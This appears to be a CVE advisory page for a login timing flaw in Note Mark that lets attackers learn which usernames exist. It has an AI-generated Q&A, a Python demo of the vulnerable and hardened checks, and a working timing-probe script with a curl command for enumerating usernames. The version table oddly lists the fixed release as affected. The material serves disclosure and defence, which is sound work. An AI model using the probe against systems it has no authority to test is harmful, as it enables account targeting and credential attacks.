CVE-2026-40263
Username Enumeration via Timing Attack in Note Mark Login
Publication date: 2026-04-17
Last updated on: 2026-04-17
Assigner: GitHub, Inc.
Description
Affected Vendors & Products
| Vendor | Product | Affected version range |
|---|---|---|
| note_mark | note_mark | < 0.19.2 (0.19.2 excluded) |
| note_mark | note_mark | 0.19.2 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-208 (Observable Timing Discrepancy) | Two separate operations in a product require different amounts of time to complete, in a way that is observable to an actor and reveals security-relevant information about the state of the product, such as whether a particular operation was successful or not. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in Note Mark, an open-source note-taking application, in versions 0.19.1 and earlier. The login endpoint runs the bcrypt password check only when the submitted username exists; for an unknown username it returns immediately without running bcrypt at all. Because a bcrypt verification is deliberately slow, the two code paths take measurably different amounts of time, so an unauthenticated attacker can tell valid usernames from invalid ones simply by timing login responses.
By exploiting this timing discrepancy, an attacker can enumerate valid usernames and then concentrate credential attacks (password guessing, credential stuffing) on accounts known to exist.
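The early return described above and the usual countermeasure side by side, as an added Python illustration. This is not Note Mark's code and does not claim to reproduce the project's 0.19.2 patch; hashlib.scrypt from the standard library stands in for bcrypt, the user table, password and cost parameters are constructed, and the call counter exists only so the difference can be checked without relying on wall-clock timing.

```python
"""Vulnerable vs. hardened login check for CWE-208 (observable timing
discrepancy).  Added illustration, not Note Mark's code.  hashlib.scrypt
stands in for bcrypt so the block runs with the standard library only."""
import hashlib
import hmac
import os
import statistics
import time

# Cost parameters chosen so one verification takes tens of milliseconds,
# roughly the order of a bcrypt check at a typical work factor (assumption).
_SCRYPT = dict(n=2 ** 14, r=8, p=1)


def hash_password(password, salt=None):
    """Salted slow hash; returns salt || digest like a stored credential."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **_SCRYPT)
    return salt + digest


class Verifier:
    """Wraps the slow comparison and counts how often it is invoked."""

    def __init__(self):
        self.calls = 0

    def verify(self, password, stored):
        self.calls += 1
        salt, digest = stored[:16], stored[16:]
        candidate = hashlib.scrypt(password.encode(), salt=salt, **_SCRYPT)
        return hmac.compare_digest(candidate, digest)


# Constructed user table with a single real account.
USERS = {"alice": hash_password("correct horse battery staple")}

# Hash of a random password, computed once at start-up, verified against
# when the username is unknown so the slow hash still runs (hardened path).
DUMMY_HASH = hash_password(os.urandom(32).hex())


def login_vulnerable(username, password, verifier):
    """Returns early for unknown users: the slow hash only runs for real ones,
    which is the observable difference the advisory describes."""
    stored = USERS.get(username)
    if stored is None:
        return False
    return verifier.verify(password, stored)


def login_hardened(username, password, verifier):
    """Always runs exactly one slow hash; the result is discarded for unknown
    users, so response time no longer depends on whether the name exists."""
    stored = USERS.get(username)
    ok = verifier.verify(password, stored if stored is not None else DUMMY_HASH)
    return ok and stored is not None


def time_login(login, username, samples=5):
    """Median wall-clock seconds for `login` with a wrong password."""
    v = Verifier()
    timings = []
    for _ in range(samples):
        start = time.perf_counter()
        login(username, "wrong-password", v)
        timings.append(time.perf_counter() - start)
    return statistics.median(timings)


if __name__ == "__main__":
    for name, login in (("vulnerable", login_vulnerable), ("hardened", login_hardened)):
        known = time_login(login, "alice")
        unknown = time_login(login, "nobody")
        print(f"{name:10s} known={known * 1000:7.1f} ms  unknown={unknown * 1000:7.1f} ms")
```

Running the block prints a large known/unknown gap for the vulnerable variant and near-identical medians for the hardened one; the counter shows why, since the hardened path performs one slow hash whether or not the username exists.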
How can this vulnerability impact me?
The vulnerability allows attackers to discover valid usernames on the Note Mark application by measuring response times during login attempts.
Once attackers know valid usernames, they can focus their efforts on those accounts, increasing the risk of successful credential-based attacks such as password guessing or brute force attacks.
Although the CVSS score is relatively low (3.7), the information disclosure can facilitate further attacks that may compromise user accounts.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, upgrade Note Mark to version 0.19.2 or later, where the timing discrepancy in the login endpoint has been fixed. Until the upgrade is applied, rate limiting on the login endpoint slows enumeration but does not remove the timing oracle.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability allows unauthenticated attackers to enumerate valid usernames by measuring response times during login attempts. This could potentially facilitate targeted credential attacks.
However, there is no specific information provided about how this vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The discrepancy can be confirmed by timing the login endpoint for a username known to exist and for one that certainly does not. The difference is the cost of one bcrypt verification, which at common work factors is on the order of tens to hundreds of milliseconds, so it is usually visible even over a network. A single request, however, is dominated by network jitter: take a few dozen samples per username, alternate between the two names so that drift affects both equally, and compare medians rather than individual runs.
To check your own instance, use curl and let it report the request time itself. The URL, endpoint path and field names below are placeholders; substitute those of your deployment.
- Send a login request for a valid username and record the time (curl's %{time_total} excludes the process start-up that the shell's time builtin would include), for example: curl -s -o /dev/null -w '%{time_total}\n' -X POST -d 'username=validuser&password=any' https://your-note-mark-instance/login
- Repeat the same command with a non-existent username, alternating between the two names for several rounds, and compare the medians.
- If the valid username is consistently slower by roughly the cost of a hash verification, the instance is still vulnerable; after upgrading to 0.19.2 the two medians should no longer be distinguishable.
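The same check as a script, added here as an example rather than taken from the advisory or the project. It replaces the single curl run with interleaved samples and a median comparison against a noise floor; the URL, endpoint path and form field names are assumptions to be replaced with those of the deployment under test, and it must only be pointed at systems you are authorised to assess.

```python
"""Client-side timing probe for a login endpoint.

Added example, not part of the advisory.  Many interleaved samples and a
median comparison replace a single `time curl`, because one request is
dominated by network jitter.  The URL, endpoint path and form field names
are placeholders (assumptions): take the real ones from the deployment."""
import statistics
import sys
import time
import urllib.error
import urllib.parse
import urllib.request


def time_login_request(url, username, password="definitely-wrong", timeout=10):
    """Seconds until the server finishes answering one form-encoded POST.
    A 4xx reply is the expected answer for a bad password and still counts."""
    body = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(url, data=body, method="POST")
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError as err:
        err.read()
    return time.perf_counter() - start


def collect(url, candidate, control, rounds=30):
    """Interleave requests for the candidate username and a control name that
    certainly does not exist, so slow drift affects both populations equally."""
    cand, ctrl = [], []
    for _ in range(rounds):
        cand.append(time_login_request(url, candidate))
        ctrl.append(time_login_request(url, control))
    return cand, ctrl


def compare(candidate_times, control_times, threshold=3.0):
    """Median gap between the two populations measured in units of their
    noise (median absolute deviation).  `distinguishable` is True when the
    candidate is slower by more than `threshold` noise units, which is the
    signature of the slow hash running only for that username."""
    med_c = statistics.median(candidate_times)
    med_k = statistics.median(control_times)

    def mad(xs, m):
        return statistics.median(abs(x - m) for x in xs)

    noise = max(mad(candidate_times, med_c), mad(control_times, med_k), 1e-9)
    gap = med_c - med_k
    return {
        "median_candidate": med_c,
        "median_control": med_k,
        "gap": gap,
        "gap_over_noise": gap / noise,
        "distinguishable": gap > 0 and gap / noise > threshold,
    }


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: probe.py <login-url> <username-to-test>")
    url, candidate = sys.argv[1], sys.argv[2]
    # Control name chosen to be unregistered with overwhelming likelihood.
    control = "zz-no-such-user-" + str(int(time.time()))
    cand, ctrl = collect(url, candidate, control)
    result = compare(cand, ctrl)
    print(f"{candidate}: median {result['median_candidate'] * 1000:.1f} ms vs "
          f"control {result['median_control'] * 1000:.1f} ms, "
          f"gap/noise {result['gap_over_noise']:.1f}, "
          f"{'likely valid' if result['distinguishable'] else 'not distinguishable'}")
```

On a vulnerable instance the candidate's median sits one hash verification above the control and the script reports it as likely valid; after upgrading to 0.19.2 the gap should fall inside the noise floor and the verdict flips to not distinguishable. The threshold of three noise units is a conventional starting point, not a calibrated value, so raise it and the round count on a noisy link.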